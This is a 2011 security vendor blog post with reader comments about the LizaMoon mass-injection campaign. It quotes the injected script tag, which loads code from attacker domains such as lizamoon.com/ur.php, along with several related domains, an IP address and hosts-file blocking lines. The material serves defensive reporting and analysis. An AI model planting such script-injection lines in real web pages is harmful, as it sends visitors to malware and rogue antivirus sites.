Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

LizaMoon mass injection hits over 226,000 URLs (was 28,000)

View all posts > 

LizaMoon mass injection hits over 226,000 URLs (was 28,000)

Posted: 29 Mar 2011 10:15 | Patrik Runald | 31 comment(s)


Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

 

Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

 

LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

 

<script src=hxxp://lizamoon.com/ur.php></script>

 

According to a Google Search, over 28,000 226,000 URLs have been compromised. This includes several iTunes URLs, as you can see below:

 

 

And here is the injected code at one of those iTunes URLs:

 

 

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.

 

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

 

The domain lizamoon.com was registered three days ago with clearly fake information:

 

 

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

 

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.

 

 

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.

 



Comments

danieleran said on Tuesday, March 29, 2011 5:29 PM

You say it has infected iTunes links, then provide podcast feeds as proof, then note that Apple encodes URLs within the podcast feeds to prevent them from being executable.

This seems alarmist misinformation to run with as your headline.

Jonathan Cremin said on Wednesday, March 30, 2011 7:05

So long story short, iTunes has not in fact been compromised.

Patrik Runald said on Wednesday, March 30, 2011 10:30

Thanks for your feedback. We understand what you are saying, but we have stuck to reporting the facts. The podcasts in iTunes does contain the reference to the malicious site, it's just been neutered by Apple. In the blog we also commend Apple for doing so.

Jay Barnes said on Wednesday, March 30, 2011 11:54

Also observed hxxp://lizamoon.com/ur.php containing javascript redirect to hxxp://system-scanner-uyxt.co.cc/scan1b/237?sessionId=05005504[...], which was already a dead hostname by the time user received redirect.  Server that contained lizamoon.com reference for this user was hxxp://www.equusnow.com, which appears to be clean at the moment.

Similar (or identical) campaign may involve redirects to hxxp://system-scanner-eopa.co.cc containing fake-av.  Another compromised server, hxxp://hccems.com/hr-adriana-lima-vogue-spain/, earlier today contained javascript code redirecting to system-scanner-eopa.co.cc only if the request used a google referer.  That hccems.com page, with a google referer, currently redirects to hxxp://xz163v92.dyndns-ip.com/3/ (also fake-av).

Maye said on Wednesday, March 30, 2011 5:56 PM

This same attack is now happening with tadygus.com instead of lizamoon.

Jerry Mangiarelli said on Thursday, March 31, 2011 5:03

I've been following this one for a while and it dates back to Dec 2010, using the same method and files as lizamoon

"<script src hxxp://sol-stats.info/ur.php"

Bryan said on Thursday, March 31, 2011 5:39

694,000 hits at this time. It's growing.

rob davis said on Thursday, March 31, 2011 6:48

statement: itunes data has been updated with 3rd party data

statement: itunes has been compromised

statement: itunes users are unaffected due to the encoding performed by apple.

my question is where in the process has itunes got injected with code? could well be seperate 3rd parties that supply apple.

DC said on Thursday, March 31, 2011 8:54

So, it looks more like a XSS attack to me, not SQL injection.

Or are you saying that there is some SQL injection being used to compromise these RSS feeds so that they contain XSS code?

If that is the case, where are the details on the actual SQL injection that is the root cause of this "issue"?  Without that information, how is anyone supposed to do anything to stop it?

Zo said on Thursday, March 31, 2011 9:35

But then you might as well say it's infected Google, because you can see the reference to the site in the Google search results.  Really all that's happened is all that all those little sites have been compromised, not iTunes and not Google.

vty said on Thursday, March 31, 2011 10:22

It looks like this injection has changed to hxxp://t6ryt56.info/ur.php as of at least last night.

Has anyone experienced this on non-2k3/MSSQL 2005 boxes? I've yet to find a 2k8 server affected.

If anyone needs assistance, if you google "lizamoon fix" you'll find my nick/domain and I've posted some useful find&replace (convert) sql queries. Don't mean to advertise here (thus no url), but when this first struck I had to spend quite a bit of time figuring out a sanitizing method post-inject.

Thanks to websense for following this.

Anirban said on Thursday, March 31, 2011 10:48

There are two more links that get injected in tandem with the lizamoon malware. This is a common trend for SQL injection. The following post provides more details.

www.stopthehacker.com/.../lizamoon-hack-mass-sql-injection

The two accompanying links are:

src=hxxp://t6ryt56.info/ur.php

src=hxxp://sol-stats.info/ur.php

Michel Chamberland said on Thursday, March 31, 2011 11:07

Can you elaborate as to why this is considered a mass SQL injection vs a persistent XSS attack?

Demetri Alekseev said on Thursday, March 31, 2011 12:04 PM

Still, the headline should not read as it does.  It insinuates that iTunes users are compromised. Why doesn't this mention MS Outlook or MS Explorer, both of which process RSS and both of which could be compromised no?  Is it that iTunes is a bigger headline and for the hit-ho factor, more juicy?  

Come, do tell us about Microsoft IE and how it processes the RSS and MS Outlook…  Is it that nobody is really impacted by this and it is a wild shot in the air (lisamoon) or is it that you did not report on the real liability?

Jason Haar said on Thursday, March 31, 2011 3:08 PM

Has anyone got logs of what the attack looks like? I'm wondering if snort (or other NIDS) will pick this attack?

Ben Peddell said on Thursday, March 31, 2011 3:37 PM

Searching for "</title><script src=http://*/ur.php" (www.google.com/search*%2Fur.php%22) returns about 3.78 million results, and this appears to be growing.

OrderZero said on Thursday, March 31, 2011 4:33 PM

Technically any showing of the script at all would indicate it's not being executed simply shown to the user meaning it's encoded (like your nice apology to apple.com after saying essentially iTunes is infected) so your Google estimation while extremely broad (seeing that Google indexes multiple pages from a website not just one each one being one more result therefore there may only be 226 websites infected with 1000 pages on each) is also extremely wrong.

In addition to this a simple SQL injection wouldn't allow a stacked SELECT let alone an INSERT so while it's possible it's automated it's highly unlikely it's a  simple sql injection and more than likely some vulnerability in some web application somewhere.

Enjoy the hysteria public and remember it's always China's fault!

Patrik Runald said on Thursday, March 31, 2011 4:56 PM

All good feedback, thanks for submitting them.

We just published an update on what we've seen in the last 24h and it's clear it's getting worse. We also included our thoughts on the iTunes statement. Feel free to comment away on that post as well.

community.websense.com/.../update-on-lizamoon-mass-injection.aspx

Thanks,

Patrik

Calum said on Friday, April 01, 2011 10:02

Just did a little disection of a website infected with the rogue code and I have found it. Norton helped as well

Calum said on Friday, April 01, 2011 10:13

Did a bit of research and found that the IP adress is 95.64.9.18. It indicated in Whois that the IP is romanian... Lizamoon is one of the sites that used it.

Antony said on Friday, April 01, 2011 10:44

Just to be clear to those who actually know very little about database servers...a database server is not "vulnerable to SQL injection". Poorly-programmed and secured *applications* are vulnerable to SQL injection.

It really annoys me to see databases blamed for poor application development practices.

Daryol VanHyning said on Friday, April 01, 2011 1:11 PM

My email site was compromised

toyotawhizguy said on Friday, April 01, 2011 4:54 PM

You can block malicious sites by editing your "hosts" file using Notepad. For example, add the following line:

127.0.0.1 www.lizamoon.com #attack site 03/29/11

You can also list the site's IP address instead of the domain name:

127.0.0.1 95.64.9.18 #attack site 03/29/11

I maintain my "hosts" file as "read only" after editing, this protects it from malicious attacks.

Annabel said on Saturday, April 02, 2011 1:34

I'm just an ordinary member of Joe Public and have experienced no less than 3 of these attacks on my PC since January. The first was as a result of a google search for free text to put in Wordle.  Others were the results of searches for free images to use in a photoshop competition.  One of them resulted in a Trojan which was thankfully blocked by my anti-virus software.  I didn't hang around to take a screen shot!

Dave Usher said on Saturday, April 02, 2011 8:04

Any particular CMS involved such as Wordpress, or is this more across-the-board?

People of the World said on Saturday, April 02, 2011 8:05

I love how the first two comments were people just concerned Apple was even mentioned. Apple was then applauded for containing the scripts, yet not good enough. Haha, some Apple people just can't believe that their products might be fallible.

Pete said on Saturday, April 02, 2011 12:11 PM

I am still confused by the SQL injection reference.  Usually, an SQL injection is a vulnerability in an application which is then exploited for an persistent XSS or CSRF.  What application has the SQL injection vulnerability? I get that RSS may pick up the persistent XSS but it has to get into a DB to start with and it can't get into a DB without an app.  Which app has the vulnerability?

Arun said on Saturday, April 02, 2011 8:39 PM

One of my websites were attacked by Lizamoon but the code is different. Identified and neutralized. Following is the code identified.

</title><script src=lizamoon.com/.../script></title><script">lizamoon.com/.../title><script src=lizamoon.com/.../script>

Does anyone know how this attack could have happen? Please share.

Thanks

Arun

David Dede said on Monday, April 04, 2011 7:02

Some more details about it (lots of other domains participating in this attack):

blog.sucuri.net/.../lizamoon-mass-sql-injection-ur-php-updates.html

thanks,

APK said on Tuesday, April 05, 2011 3:19

To toyotawhizguy - YOU CANNOT USE A HOSTS FILE LIKE THIS (as you stated):

127.0.0.1 95.64.9.18 #attack site 03/29/11

That you have to use a firewall for (making a rule to not communicate with 95.64.9.18) & you can do that in either a software based firewall program, OR, a router's rules tables for security.

This you CAN do though (which you also mentioned - block it by domain/host name in HOSTS):

127.0.0.1 www.lizamoon.com #attack site 03/29/11

Note - using 127.0.0.1 causes a loopback operation, & is longer (thus, less efficient) than is 0.0.0.0 (which works as a valid blocking address vs. known bad sites/servers, & on ALL forms of Windows).

I.E.-> 0.0.0.0 is 2 characters shorter PER LINE than is the loopback adapter address 127.0.0.1 also) & thus it is faster to read into your local DNS Clientside Cache OR the diskcache of the Operating System (since HOSTS files are just that, files).

However, better yet is 0 (but, this only works on Windows 2000/XP/Server 2003 nowadays & it is the shortest/fastest/most efficient of the 3 possibles you can use for "blocking addresses" vs. known malicious sites/servers).

Enjoy (that's for his reference or anyone else's using HOSTS vs. these malicious sites/servers lists that GOOD security articles of this nature produce, as this one clearly is!)

Alexander Peter Kowalski

apk

John said on Thursday, April 07, 2011 5:31 PM

We monitored an attack from a compromised web server on monday and the source appeared to be a domain in Myanmar, Burma which was sending out commands to thousands of servers. We only picked ip up when traffic on a switch port hit 100% and bursted through the day. A network sniff revelaed traffic being sent via our compromised server to domains everywhere but the domain sending data to our server was in burma. We isolated the server so we could do some in-house testing... interesting that the timing was co-incidental with the atttack mentioned above.


Leave a Comment

(required)  

Email address: (required)